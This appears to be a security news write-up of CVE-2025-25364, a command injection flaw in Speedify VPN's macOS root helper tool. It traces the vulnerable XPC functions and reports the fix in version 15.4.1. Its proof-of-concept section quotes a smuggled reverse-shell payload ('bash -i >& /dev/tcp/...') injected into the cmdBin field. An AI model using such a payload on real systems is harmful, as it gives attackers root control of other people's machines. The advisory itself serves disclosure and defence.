A significant security vulnerability, tracked as CVE-2025-25364, was discovered in Speedify VPN’s macOS application, exposing users to local privilege escalation and full system compromise.
The flaw, uncovered by SecureLayer7, resides in the privileged helper tool me.connectify.SMJobBlessHelper, which is responsible for executing system-level operations with root privileges for the Speedify VPN client.
The vulnerability stemmed from improper input validation in the XPC (Cross-Process Communication) interface of the helper tool.
Specifically, two user-controlled fields—cmdPath and cmdBin—within incoming XPC messages were used directly to construct command-line strings without adequate sanitization.
This oversight enabled a command injection vulnerability, allowing any local attacker to craft a malicious XPC message and inject arbitrary shell commands that would be executed as root.
The attack chain involved several functions:
XPC_Connection_Handler_block_invoke: Entry point for XPC messages. It checked for a dictionary-type message and invoked _handleLaunchSpeedifyMsg if the “request” field was “runSpeedify”. No validation was performed on the contents of cmdPath or cmdBin.
_handleLaunchSpeedifyMsg: Retrieved cmdPath and cmdBin from the XPC dictionary and passed them, unchecked, to the next function.
_RunSystemCmd: Constructed and executed a command string using asprintf, embedding the user-supplied cmdPath and cmdBin directly. The critical line was:
This command string was then executed using system(), making it trivial for an attacker to inject additional shell commands.
Risk Factors            Details
Affected Products       Speedify VPN for macOS (up to version 15.0.0)
Impact                  Local privilege escalation; arbitrary command execution as root.
Exploit Prerequisites   Local access; ability to send crafted XPC messages to the helper tool
CVSS 3.1 Score          9.8 (Critical)
Proof-of-Concept Exploit
A proof-of-concept (PoC) exploit demonstrated the issue by sending a crafted XPC message to the vulnerable service.
By setting cmdBin to a payload such as "; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ", an attacker could spawn a reverse shell with root privileges.
The exploit code, written in Objective-C, connected to the me.connectify.SMJobBlessHelper XPC service and delivered the malicious payload, resulting in immediate root-level access.
Because the helper tool ran as a root-level daemon (/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper), successful exploitation meant an attacker could:
Read, modify, or delete sensitive system files.
Install persistent malware or backdoors.
Gain complete control over the affected macOS device.
This vulnerability, therefore, posed a critical risk to any system running vulnerable versions of Speedify VPN (prior to 15.4.1).
Speedify VPN addressed the vulnerability in version 15.4.1, which included a complete rewrite of the helper tool.
The new version eliminated the insecure XPC handling and implemented proper input validation, closing the command injection vector.
Users are strongly urged to update to the latest version to mitigate the risk of exploitation.